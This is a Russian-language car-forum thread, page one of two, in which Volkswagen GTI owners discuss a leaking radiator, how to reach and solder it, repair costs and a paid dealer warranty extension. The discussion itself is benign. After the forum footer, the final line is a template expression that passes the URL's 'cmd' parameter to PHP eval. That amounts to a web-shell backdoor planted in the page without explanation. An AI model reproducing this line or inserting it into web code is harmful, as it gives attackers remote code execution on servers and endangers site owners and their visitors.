+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 15

Тема: Радиатор у кого есть.


  1. #1
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631

    Радиатор у кого есть.

    В общем поток радиатор у меня.
    Насколько знаю, что тут есть ребята, кто менял родной на радиатор от S3 или какой-то еще.
    Если у кого есть предложения пишите)))

  2. #2
    Цитата Сообщение от constantinus Посмотреть сообщение
    В общем поток радиатор у меня.
    Насколько знаю, что тут есть ребята, кто менял родной на радиатор от S3 или какой-то еще.
    Если у кого есть предложения пишите)))
    А чё ударил или сам по себе потёк? Можно же малыми усилиями запаять, и будет ок! Или на Луговой могу разборку подсказать....

  3. #3
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Да бля.... в машине есть часовой механизм... заканчивается гарантия и тут начинается...
    На ровном месте...взял и потек... Говорят на пассатах есть такая фигня от дифузора, а вот типа на гольфах нету.
    Я подозреваю, что это труп майского жука начал разлогаться и прожег трупным ядом мой радиатор, а как по другому может быть)))

    Сенкс за подсказку)

  4. #4
    GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Регистрация
    27.11.2007
    Машина
    GTI V, VTG
    Сообщений
    1,012
    Цитата Сообщение от ФОРС Посмотреть сообщение
    А чё ударил или сам по себе потёк? Можно же малыми усилиями запаять, и будет ок! Или на Луговой могу разборку подсказать....
    А место, где он течет видно?

    Просто у нас 3 радиатора, и чтобы его, как ты говоришь "малыми усилиями запять" скорее всего придется снимать все 3, а это тоже не дешево.

    Я себе запаиал герметиком когда-то давно, когда в моем vw не было кондиционера и турбины, и радиатор отлично просматривался с ямы

    Добавлено через 32 минуты
    И это, уточни какой тебе из радиаторов надо. Интеркулер точно меняли
    Последний раз редактировалось Scruj; 29.11.2009 в 15:50. Причина: Добавлено сообщение
    GTI - Get There Instantly (tm)

  5. #5
    Чуваки, на самом деле все просто и банально! До радиатора можно за 30 минут спокойно добраться... когда я все менял после ДТП первого разобрал пол машины! Можно запросто добраться при наличии обычного хорошего набора инструментов с воротками, И сразу же на месте посмотреть где и что течет! Устранить самим течь, или если не решишься то подскочить в любой ремонт радиаторов, они создадут в нем давление посмотрят и запаяют, это обойдется в гривен 40-50 максимум!

    Время вопроса, всего лишь пол выходного дня! Зато как приятно потом осознавать что все сделал САМ! :friends:

  6. #6
    GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Регистрация
    27.11.2007
    Машина
    GTI V, VTG
    Сообщений
    1,012
    Кстати, видели "акцию" (взял в кавычки, потому что не решил хорошее предложение это или плохое) от автосоюза - 3й год гарантии?
    По моему, за 500 долларов продлят гарантию еще на год. ПРавда, новый радиатор явно меньше.
    У меня уже больше 3х, так что я не кандидат в любом случае
    GTI - Get There Instantly (tm)

  7. #7
    Цитата Сообщение от Scruj Посмотреть сообщение
    Кстати, видели "акцию" (взял в кавычки, потому что не решил хорошее предложение это или плохое) от автосоюза - 3й год гарантии?
    По моему, за 500 долларов продлят гарантию еще на год. ПРавда, новый радиатор явно меньше.
    У меня уже больше 3х, так что я не кандидат в любом случае
    Я уже год думаю об этой акции... с одной стороны когда доллар был по 4,8 грн, это было не дорого, теперь не знаю что и делать, а времени до конца гарантии остается тупо ровно 1 месяц ))) Ну и еще 15 дней Нового года!!! АААААААА наверное буду платить, т.к. практически любая запчасть оригинальная и выльется в 500$ :laugh::laugh::laugh:

  8. #8
    GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Регистрация
    27.11.2007
    Машина
    GTI V, VTG
    Сообщений
    1,012
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Я уже год думаю об этой акции... с одной стороны когда доллар был по 4,8 грн, это было не дорого, теперь не знаю что и делать, а времени до конца гарантии остается тупо ровно 1 месяц ))) Ну и еще 15 дней Нового года!!! АААААААА наверное буду платить, т.к. практически любая запчасть оригинальная и выльется в 500$ :laugh::laugh::laugh:
    А, так это еще и боян! Сорри
    У емня 3й год прошел гладко. Меняли прокладку крышки двигателя.... пару сайлентблоков
    Я первые два года над машиной так издевался, что ломалось все что могло, а сейчас осторожничаю, так как новую, если что, купить в данной экономической ситуации будет сложнее
    GTI - Get There Instantly (tm)

  9. #9
    Цитата Сообщение от Scruj Посмотреть сообщение
    А, так это еще и боян! Сорри
    У емня 3й год прошел гладко. Меняли прокладку крышки двигателя.... пару сайлентблоков
    Я первые два года над машиной так издевался, что ломалось все что могло, а сейчас осторожничаю, так как новую, если что, купить в данной экономической ситуации будет сложнее
    Согласен... сейчас не легкие времена! :friends: Трымаймося!

  10. #10
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Нету третьего года гарантии сейчас на автосоюзе.
    И то когда это было - то это под эгидой страховой компании, а следовательно это не 500$.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. 18'' на 4-й гольф - у кого есть опыт?
    от V.e.R в разделе Шины, диски
    Ответов: 23
    Последнее сообщение: 01.04.2024, 12:10
  2. У кого есть последние ПОИ от Venom?
    от Mityan в разделе Авто Звук
    Ответов: 9
    Последнее сообщение: 03.01.2024, 17:51
  3. выдержит ли сцепа ст.2? механика.есть ли опыт у кого или знакомые у кого такой сетап?
    от koct88 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 27
    Последнее сообщение: 02.10.2023, 16:25
  4. DSG. Есть ли у кого проблемы?
    от Flex в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 226
    Последнее сообщение: 18.12.2012, 13:13
  5. 1.8T AWP есть проблемы? У кого есть мысли?
    от veteromska в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 47
    Последнее сообщение: 19.03.2010, 20:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}